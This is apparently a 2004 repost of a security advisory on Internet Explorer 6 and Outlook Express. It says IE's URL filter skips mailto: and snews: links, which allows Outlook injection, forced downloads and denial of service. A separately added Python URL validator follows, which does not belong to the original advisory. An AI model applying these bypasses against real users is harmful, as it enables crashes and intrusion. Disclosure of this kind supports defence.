Microsoft Internet Explorer Multiple Vulnerabilities
Rafel Ivgi, The-Insider
Wednesday Jan. 21, 2004
Every time I read about a vulnerability concerning I.E I believe more and more that I.E is the biggest backdoor ever. After the CONTENT-TYPE: bug that allowed downloading exe's as audio's, and all the patches, I.E 6 still has parsing problems.
I discovered that, amazingly, with another wonderful Microsoft software, I can force downloads on users, fake downloaded file extensions and names, inject scripts into the "blank" file, run a lot of different applications, cause a lot of errors and see the content of binary files inside I.E, cause a buffer overflow in Outlook and even D.O.S the system. Before you read the following text, I believe the most dangerous bug in I.E is the possibility of actively creating or popping up new windows *without a limit* (only the memory limit). This makes it easy to create many errors and overflows, and to D.O.S internet users.
**************************************************
Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)
Microsoft has inserted a filtering engine inside Internet Explorer. This engine verifies that only secure, valid and appropriately formed (in syntax) data will be passed on to external applications.
**************************************************
The filtering engine skips a few important checks, such as the "MAILTO:" protocol. With no filtering, it allows inappropriate data to be sent to the default mail client.
Example: a mailto: URL several hundred bytes long, made of percent-encoded high-bit and NUL bytes between long runs of "a" characters,
which pops up the following error message: "The default mail client is not properly installed".
There should be filtering, because there cannot be an email address such as this one (which is nevertheless accepted by the I.E plugin filter):
**************************************************
This filtering engine also filters Outlook links such as the NNTP & SNTP protocols. However, the security hole appears when an attacker uses the SNEWS protocol, which has no filtering.
nntp://aaaaaa.com/aaaaa - filtering active! - results in an error message.
sntp://aaaaaaaaaaaaaaa - filtering active! - results in an error message.
snews://aaaaaaaaaaaaa - filtering *inactive!* - results in activation of Outlook and server injection into Outlook.
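Added illustration, not code from the advisory or from Microsoft: a Python validator of the kind the filtering engine described above should apply uniformly to every scheme handed to an external client (mailto:, nntp:, snews:), covering both the unfiltered mailto: case and the unfiltered snews: case. It decodes percent-escapes and rejects control bytes, NULs, non-ASCII and malformed addresses before the hand-off; the scheme allowlist, length cap and address grammar are my assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: schemes the browser may forward to an external client.
# Every one of them goes through the same checks, so no scheme (e.g. snews:)
# bypasses the filter the way the advisory describes.
EXTERNAL_SCHEMES = {"mailto", "nntp", "snews"}
MAX_URL_LEN = 2048  # assumed cap; the advisory's payloads are far longer

# Conservative addr-spec (dot-atom local part @ dotted hostname) and hostname grammar.
ADDR_SPEC = re.compile(r"^[A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")
HOST = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*$")


def check_external_url(url):
    """Return (ok, reason); ok is True only if url is safe to hand to an external app."""
    if len(url) > MAX_URL_LEN:
        return False, "url too long"
    scheme, sep, rest = url.partition(":")
    scheme = scheme.lower()
    if not sep or scheme not in EXTERNAL_SCHEMES:
        return False, "scheme not allowed"
    # Decode %XX escapes to raw bytes: inspect what the client would actually receive.
    raw = unquote_to_bytes(rest)
    if any(b < 0x20 or b == 0x7F for b in raw):
        return False, "control byte after decoding"
    if any(b >= 0x80 for b in raw):
        return False, "non-ASCII byte after decoding"
    decoded = raw.decode("ascii")
    if scheme == "mailto":
        # Validate the recipient list; header fields after '?' are not forwarded here.
        addrs, _, _ = decoded.partition("?")
        for addr in addrs.split(","):
            if not ADDR_SPEC.match(addr):
                return False, "malformed address: %r" % addr
        return True, "ok"
    # nntp:// and snews:// must carry an authority: //host[:port][/group]
    if not decoded.startswith("//"):
        return False, "missing authority"
    authority, _, _ = decoded[2:].partition("/")
    host, _, port = authority.partition(":")
    if not HOST.match(host) or (port and not port.isdigit()):
        return False, "malformed host"
    return True, "ok"
```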
Story continues at Help Net Security
Posted on Wednesday, 21 January 2004 @ 10:35:28 EST by cj